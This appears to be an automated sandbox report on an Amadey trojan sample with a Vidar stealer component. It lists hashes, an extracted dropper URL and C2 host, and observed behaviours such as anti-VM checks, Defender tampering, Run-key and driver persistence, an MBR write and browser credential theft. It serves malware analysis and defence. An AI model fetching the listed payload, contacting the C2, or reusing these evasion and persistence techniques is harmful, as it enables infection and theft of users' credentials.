amadey | 84b3819705253e706e5ad1116a32bff8dc8f23aa355815486801bd2a22663446

Analysis

max time kernel
142s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20250313-en
resource tags

arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
submitted
24/03/2025, 07:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

155557f5e69e2cf0af05029b9c80d4a1.exe
Size

1.8MB
MD5

155557f5e69e2cf0af05029b9c80d4a1
SHA1

e53704de709ccbddc75a3f2e3b854fc3a0d99c74
SHA256

84b3819705253e706e5ad1116a32bff8dc8f23aa355815486801bd2a22663446
SHA512

2c644539e33396d9127ace36a1f764bbc5a2a984562c86494ea3af30b8896a295e1cdd5faa4dd00b70e998e255b7ad36ccac1116636be02c84d1e374b1975db1
SSDEEP

49152:70mBuV7OfF/Ybv9tTrNzvRuYnHlPKGPY:706uV0WL9tHjuspPY

Score

10^/10

amadey vidar 092155 bootkit credential_access defense_evasion discovery execution exploit persistence privilege_escalation spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Vidar Stealer 1 IoCs

stealer

resource	yara_rule
behavioral2/memory/12124-21043-0x0000000000400000-0x000000000086B000-memory.dmp	family_vidar_v7

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 10984 created 2600	10984	Organizations.com	44

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempBXZDMB8M2P4MRBHHBWPGVLGVIAI7CLNS.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	831adba42a.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	9ccc466db6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7571af87e1.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	155557f5e69e2cf0af05029b9c80d4a1.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
130	1392	powershell.exe
203	2664	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2664	powershell.exe
1392	powershell.exe
1724	powershell.exe
6176	powershell.exe
3656	powershell.exe
2628	powershell.exe
1972	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 15 IoCs

flow	pid	Process
814	4472	rapes.exe
1585	2080	svchost.exe
261	4472	rapes.exe
319	4472	rapes.exe
409	4472	rapes.exe
42	4472	rapes.exe
42	4472	rapes.exe
42	4472	rapes.exe
287	5832	svchost.exe
1634	4472	rapes.exe
35	4472	rapes.exe
130	1392	powershell.exe
203	2664	powershell.exe
210	4472	rapes.exe
1517	4472	rapes.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\Drivers\367f83e6.sys	bab10adf.exe
File created	C:\Windows\System32\Drivers\klupd_367f83e6a_arkmon.sys	bab10adf.exe
File created	C:\Windows\System32\Drivers\klupd_367f83e6a_klbg.sys	bab10adf.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
2708	takeown.exe
412	icacls.exe

Sets service image path in registry 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\eItNIJji_5880\ImagePath = "\\??\\C:\\Windows\\Temp\\tgO6H5Yg_5880.sys"	tzutil.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\367f83e6\ImagePath = "System32\\Drivers\\367f83e6.sys"	bab10adf.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_367f83e6a_arkmon\ImagePath = "System32\\Drivers\\klupd_367f83e6a_arkmon.sys"	bab10adf.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_367f83e6a_klbg\ImagePath = "System32\\Drivers\\klupd_367f83e6a_klbg.sys"	bab10adf.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_367f83e6a_klark\ImagePath = "System32\\Drivers\\klupd_367f83e6a_klark.sys"	bab10adf.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_367f83e6a_mark\ImagePath = "System32\\Drivers\\klupd_367f83e6a_mark.sys"	bab10adf.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_367f83e6a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_367f83e6a_arkmon.sys"	bab10adf.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 8 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
10232	chrome.exe
9956	chrome.exe
9856	chrome.exe
7800	msedge.exe
6796	msedge.exe
6808	msedge.exe
13152	chrome.exe
1368	chrome.exe

Checks BIOS information in registry 2 TTPs 18 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	831adba42a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	155557f5e69e2cf0af05029b9c80d4a1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	155557f5e69e2cf0af05029b9c80d4a1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9ccc466db6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9ccc466db6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7571af87e1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempBXZDMB8M2P4MRBHHBWPGVLGVIAI7CLNS.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempBXZDMB8M2P4MRBHHBWPGVLGVIAI7CLNS.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7571af87e1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	831adba42a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	11.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	zx4PJh6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	11.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Control Panel\International\Geo\Nation	155557f5e69e2cf0af05029b9c80d4a1.exe

Deletes itself 1 IoCs

pid	Process
4312	w32tm.exe

Executes dropped EXE 29 IoCs

pid	Process
4472	rapes.exe
1960	cUpXaxB.exe
776	apple.exe
2072	11.exe
60	11.exe
2992	Jq0hGDZ.exe
936	36e7f6abff.exe
1660	TempBXZDMB8M2P4MRBHHBWPGVLGVIAI7CLNS.EXE
5088	rapes.exe
3584	OkH8IPF.exe
6136	483d2fa8a0d53818306efeb32d3.exe
4916	y0u3d_003.exe
2752	tK0oYx3.exe
5880	tzutil.exe
4312	w32tm.exe
4556	zx4PJh6.exe
8124	cUpXaxB.exe
10984	Organizations.com
11348	Jq0hGDZ.exe
12124	831adba42a.exe
5060	f230181bbb.exe
8972	rapes.exe
8488	5ad03fa0.exe
7884	bab10adf.exe
9972	9ccc466db6.exe
12544	svchost015.exe
4496	7571af87e1.exe
4552	svchost015.exe
3456	laf6w_001.exe

Identifies Wine through registry keys 2 TTPs 9 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	TempBXZDMB8M2P4MRBHHBWPGVLGVIAI7CLNS.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	7571af87e1.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	155557f5e69e2cf0af05029b9c80d4a1.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	831adba42a.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Wine	9ccc466db6.exe

Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\367f83e6.sys\ = "Driver"	bab10adf.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\367f83e6.sys	bab10adf.exe

Loads dropped DLL 25 IoCs

pid	Process
7884	bab10adf.exe
7884	bab10adf.exe
7884	bab10adf.exe
7884	bab10adf.exe
7884	bab10adf.exe
7884	bab10adf.exe
7884	bab10adf.exe
7884	bab10adf.exe
7884	bab10adf.exe
7884	bab10adf.exe
7884	bab10adf.exe
7884	bab10adf.exe
7884	bab10adf.exe
7884	bab10adf.exe
7884	bab10adf.exe
7884	bab10adf.exe
7884	bab10adf.exe
7884	bab10adf.exe
7884	bab10adf.exe
7884	bab10adf.exe
7884	bab10adf.exe
7884	bab10adf.exe
7884	bab10adf.exe
7884	bab10adf.exe
7884	bab10adf.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2708	takeown.exe
412	icacls.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\eac0c664-9c26-4f92-b886-f83391947c1b = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{ffb9f3d8-4e26-4cfd-a442-be36c2533d9d}\\eac0c664-9c26-4f92-b886-f83391947c1b.cmd\""	bab10adf.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {7621FABD-8E1C-4682-ACCD-F95D288F67B3}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {7621FABD-8E1C-4682-ACCD-F95D288F67B3}"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Service 8562 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\10317340101\\Jq0hGDZ.exe\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\36e7f6abff.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10317930101\\36e7f6abff.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Service 1042 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\10318460101\\Jq0hGDZ.exe\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10317940121\\am_no.cmd"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	bab10adf.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	bab10adf.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0012000000024294-107.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
9220	tasklist.exe
9568	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

pid	Process
3880	155557f5e69e2cf0af05029b9c80d4a1.exe
4472	rapes.exe
1660	TempBXZDMB8M2P4MRBHHBWPGVLGVIAI7CLNS.EXE
5088	rapes.exe
6136	483d2fa8a0d53818306efeb32d3.exe
12124	831adba42a.exe
8972	rapes.exe
9972	9ccc466db6.exe
4496	7571af87e1.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 3584 set thread context of 2872	3584	OkH8IPF.exe	208
PID 2752 set thread context of 1900	2752	tK0oYx3.exe	219
PID 5060 set thread context of 12736	5060	f230181bbb.exe	250
PID 9972 set thread context of 12544	9972	9ccc466db6.exe	283
PID 4496 set thread context of 4552	4496	7571af87e1.exe	287

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	5ad03fa0.exe
File opened (read-only)	\??\VBoxMiniRdrDN	bab10adf.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\OfficeForbes	zx4PJh6.exe
File opened for modification	C:\Windows\CylinderPair	zx4PJh6.exe
File created	C:\Windows\Tasks\rapes.job	155557f5e69e2cf0af05029b9c80d4a1.exe
File opened for modification	C:\Windows\NecessityInfections	zx4PJh6.exe
File opened for modification	C:\Windows\VancouverPulse	zx4PJh6.exe
File opened for modification	C:\Windows\GuaranteesFear	zx4PJh6.exe
File opened for modification	C:\Windows\SheDrum	zx4PJh6.exe
File opened for modification	C:\Windows\InvestingTr	zx4PJh6.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
436	sc.exe
5492	sc.exe
2932	sc.exe
948	sc.exe
3692	sc.exe
1120	sc.exe
5436	sc.exe
264	sc.exe
4484	sc.exe
5152	sc.exe
1748	sc.exe
1900	sc.exe
4256	sc.exe
6072	sc.exe
3400	sc.exe
5504	sc.exe
5060	sc.exe
5412	sc.exe
3388	sc.exe
3196	sc.exe
3352	sc.exe
5656	sc.exe
3048	sc.exe
5884	sc.exe
5280	sc.exe
4260	sc.exe
5468	sc.exe
2348	sc.exe
1872	sc.exe
976	sc.exe
5488	sc.exe
4104	sc.exe
5764	sc.exe
2752	sc.exe
3456	sc.exe
3100	sc.exe
3152	sc.exe
2308	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	bab10adf.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	bab10adf.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
6688	10984	WerFault.exe	236

System Location Discovery: System Language Discovery 1 TTPs 50 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zx4PJh6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Organizations.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	11.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	36e7f6abff.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cUpXaxB.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
